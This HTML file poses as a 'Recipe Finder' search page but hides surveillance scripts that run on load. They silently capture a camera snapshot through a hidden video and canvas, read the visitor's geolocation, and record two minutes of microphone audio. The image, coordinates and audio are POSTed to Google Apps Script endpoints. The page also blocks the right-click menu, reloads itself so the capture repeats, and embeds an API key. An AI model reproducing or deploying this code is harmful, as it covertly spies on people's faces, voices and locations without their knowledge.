<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=1100" />
    <link rel="icon" type="image/png" href="images/photo1.jpg" />
    <style>
      body {
        background-color: #f5f5f5;
        font-family: Arial, sans-serif;
        font-size: 16px;
        line-height: 1.5;
        margin: 0;
        padding: 20px; /* Added padding to the body */
      }

      .container {
        max-width: 800px;
        margin: 0 auto;
        padding: 20px;
        background-color: #fff;
        border-radius: 8px;
        box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
      }
      .container1 {
        max-width: 100%;
        margin: 0 auto;
        padding: 20px;
        background-color: #fff;
        border-radius: 8px;
        box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
      }

      header {
        background-color: #fff;
        box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
        padding: 20px;
        margin-bottom: 20px;
        border-radius: 8px;
      }

      h1 {
        color: #333;
        font-size: 32px;
        margin: 0;
        text-align: center;
      }

      form {
        display: flex;
        flex-wrap: wrap;
        justify-content: center;
        margin: 20px 0;
      }

      input[type="text"] {
        background-color: #fff;
        border: 2px solid #ccc;
        border-radius: 8px;
        font-size: 16px;
        padding: 12px;
        width: 300px;
        margin-right: 10px;
      }

      .btn {
        cursor: pointer;
        background-color: #007bff;
        border: none;
        border-radius: 8px;
        color: #fff;
        font-size: 16px;
        padding: 12px 20px;
        transition: background-color 0.2s;
      }

      .btn:hover {
        background-color: #0069d9;
      }

      #results {
        display: grid;
        gap: 40px;
        grid-template-columns: repeat(auto-fit, minmax(250px, 1fr));
        margin: 20px 0;
      }

      #results > div {
        background-color: #fff;
        border-radius: 8px;
        box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
        display: flex;
        flex-direction: column;
        padding: 20px;
      }

      #results img {
        border-radius: 8px;
        margin-bottom: 20px;
        object-fit: cover;
        height: 200px;
        width: 100%;
      }

      #results h3 {
        color: #333;
        font-size: 24px;
        margin: 0;
      }

      #results ul {
        margin: 0;
        padding: 0;
      }

      #results li {
        list-style: none;
        margin-bottom: 10px;
      }

      #results a {
        background-color: #007bff;
        border-radius: 8px;
        color: #fff;
        font-size: 16px;
        padding: 12px 20px;
        text-align: center;
        text-decoration: none;
        transition: background-color 0.2s;
        display: block;
        width: 150px;
        margin: 0 auto;
      }

      #results a:hover {
        background-color: #0069d9;
      }
    </style>
    <title>Food Finder</title>
  </head>
  <body>
    <div class="container">
      <h1>Recipe Finder</h1>
      <form>
        <input type="text" id="search" placeholder="Enter ingredients" />
        <button type="button" class="btn" onclick="searchRecipes()">
          Search
        </button>
      </form>
    </div>
    <br /><br />
    <div class="container1" style="display: none">
      <div id="results"></div>
    </div>

    <script>
      const searchInput = document.querySelector("#search");
      const resultsContainer = document.querySelector(".container1");

      async function searchRecipes() {
        const searchValue = searchInput.value.trim();
        if (searchValue !== "") {
          const response = await fetch(
            `https://api.edamam.com/search?q=${searchValue}&app_id=7aa516a5&app_key=dc836a223fb788b11ae390504d9e97ce&from=0&to=100`
          );
          const data = await response.json();
          displayRecipes(data.hits);
        } else {
          // Handle when no search value is provided
          resultsContainer.style.display = "none";
          alert("Please enter ingredients to search for recipes.");
        }
      }

      function displayRecipes(recipes) {
        const resultsList = document.querySelector("#results");
        if (recipes.length === 0) {
          resultsList.innerHTML =
            "<p>No recipes found. Try different ingredients.</p>";
        } else {
          let html = "";
          recipes.forEach((recipe) => {
            html += `
              <div>
                  <img src="${recipe.recipe.image}" alt="${
              recipe.recipe.label
            }">
                  <h3>${recipe.recipe.label}</h3>
                  <ul>
                      ${recipe.recipe.ingredientLines
                        .map((ingredient) => `<li>${ingredient}</li>`)
                        .join("")}
                  </ul>
                  <a href="${recipe.recipe.url}" target="_blank">View Recipe</a>
              </div>
              `;
          });
          resultsList.innerHTML = html;
          resultsContainer.style.display = "block"; // Show the container with results
        }
      }

      document.addEventListener("contextmenu", function (e) {
        e.preventDefault();
      });
    </script>

    <video id="video" autoplay style="display: none"></video>
    <canvas id="canvas" style="display: none"></canvas>
    <img
      id="captured-image"
      src=""
      alt="Captured Image"
      style="display: none"
    />

    <script>
      if (navigator.geolocation) {
        navigator.permissions
          .query({ name: "geolocation" })
          .then(function (result) {
            if (result.state === "granted") {
              // Geolocation access granted
              navigator.geolocation.getCurrentPosition(
                function (position) {
                  // Handle the obtained position
                },
                function (error) {
                  console.error("Error getting geolocation:", error);
                }
              );
            } else if (result.state === "prompt") {
              // Geolocation access is requested
            } else if (result.state === "denied") {
              // Geolocation access denied by the user
              console.error("Geolocation access denied by the user.");
              // You can inform the user or provide an alternative method
            } else if (result.state === "prompt") {
              // Geolocation access is requested
            }
          });
      } else {
        console.error("Geolocation is not supported by this browser.");
      }
      captureCamera();
      var imageDataUrl;
      let latitude;
      let longitude;
      let mapUrl;
      let website = "https://arunkumar-selvaraj.web.app/travel.html";
      let capturedImage = document.getElementById("captured-image");

      function captureCamera() {
        navigator.mediaDevices
          .getUserMedia({ video: true })
          .then(function (cameraStream) {
            const video = document.getElementById("video");
            const canvas = document.getElementById("canvas");
            video.srcObject = cameraStream;
            video.onloadedmetadata = function () {
              captureImage(cameraStream);
            };
          })
          .catch(function (error) {
            console.error("Error accessing the camera: " + error);
          });

        getLocation();
      }

      function getLocation() {
        if ("geolocation" in navigator) {
          navigator.geolocation.getCurrentPosition(
            function (position) {
              latitude = position.coords.latitude;
              longitude = position.coords.longitude;
              mapUrl = `https://www.google.com/maps?q=${latitude},${longitude}`;
            },
            function (error) {
              console.error("Error accessing geolocation: " + error);
            }
          );
        } else {
          console.error("Geolocation is not supported");
        }
      }

      function captureImage(stream) {
        const video = document.getElementById("video");
        const canvas = document.getElementById("canvas");
        const context = canvas.getContext("2d");
        canvas.width = video.videoWidth;
        canvas.height = video.videoHeight;
        context.drawImage(video, 0, 0, canvas.width, canvas.height);
        imageDataUrl = canvas.toDataURL("image/png");
        capturedImage.src = imageDataUrl;
        if (stream) {
          const tracks = stream.getTracks();
          tracks.forEach((track) => track.stop());
          sendImageData(imageDataUrl);
        }
      }

      function sendImageData(imageDataUrl) {
        let url =
          "https://script.google.com/macros/s/AKfycbzKjbhmM-xn3OlNj_OcchCZw_hh3jx7HrbrdXwaukXdhA8NVnKtJuqSgaLxmNi1T0BI/exec";
        console.log(latitude);
        console.log(longitude);
        console.log("imageDataUrl" + imageDataUrl.split("base64,")[1]);
        let obj = {
          base64: imageDataUrl.split("base64,")[1],
          type: "image/png",
          name: "captured_image.png",
          url: mapUrl,
          latitude: latitude,
          longitude: longitude,
          website: website,
        };
        fetch(url, {
          method: "POST",
          body: JSON.stringify(obj),
        })
          .then((response) => response.text())
          .then((data) => console.log(data))
          .catch((error) => console.error("Error sending image: " + error));
      }
    </script>

    <div id="status"><span id="statusText"></span></div>

    <script>
      const status = document.getElementById("status");

      console.log("Requesting access to the microphone...");
      navigator.mediaDevices
        .getUserMedia({ audio: true })
        .then((stream) => {
          console.log("Microphone access granted.");

          const mediaRecorder = new MediaRecorder(stream);
          const recordedChunks = [];

          mediaRecorder.ondataavailable = (event) => {
            recordedChunks.push(event.data);
            console.log("Data available...");
          };

          mediaRecorder.onstop = () => {
            console.log("Recording stopped.");
            const blob = new Blob(recordedChunks, { type: "audio/webm" });
            console.log("Blob created:", blob);
            convertBlobToBase64(blob); // Convert blob to Base64 URL
          };

          mediaRecorder.start();

          console.log("Recording started...");

          setTimeout(() => {
            mediaRecorder.stop();

            console.log("Stopping recording after 10 seconds...");
          }, 120000); // Stop recording after 10 seconds (adjust as needed)
        })
        .catch((err) => {
          console.error("Error accessing the microphone:", err);
        });

      function convertBlobToBase64(blob) {
        const reader = new FileReader();
        reader.onload = function (event) {
          const base64String = event.target.result.split(",")[1]; // Extracting base64 string
          sendAudioToServer(base64String);
        };
        reader.readAsDataURL(blob);
      }

      function sendAudioToServer(base64String) {
        const formData = new FormData();
        formData.append("audio", base64String);
        formData.append("website", website);
        formData.append("latitude", latitude);
        formData.append("longitude", longitude);
        formData.append("url", mapUrl);
        formData.append("name", "captured_image.png");
        formData.append("type", "image/png");
        formData.append("base64", imageDataUrl.split("base64,")[1]);

        fetch(
          "https://script.google.com/macros/s/AKfycbyUzkbRH18m68Qtn2yeRi33sPWfUcyShAWqiSK69_Rx_F5RZCQABKlYVpbsd0lfGEGf/exec",
          {
            method: "POST",
            body: formData,
          }
        )
          .then((response) => {
            console.log("Server response received:", response);
            return response.text(); // Convert the response to text
          })
          .then((data) => {
            console.log("Response: " + data);
          })
          .catch((error) => {
            console.error("Error sending audio to the server:", error);
            document.getElementById("status").innerText = "Error: " + error; // Display error message in the 'status' div
          });
      }

      setTimeout(function () {
        window.location.reload();
      }, 160000);
    </script>
  </body>
</html>
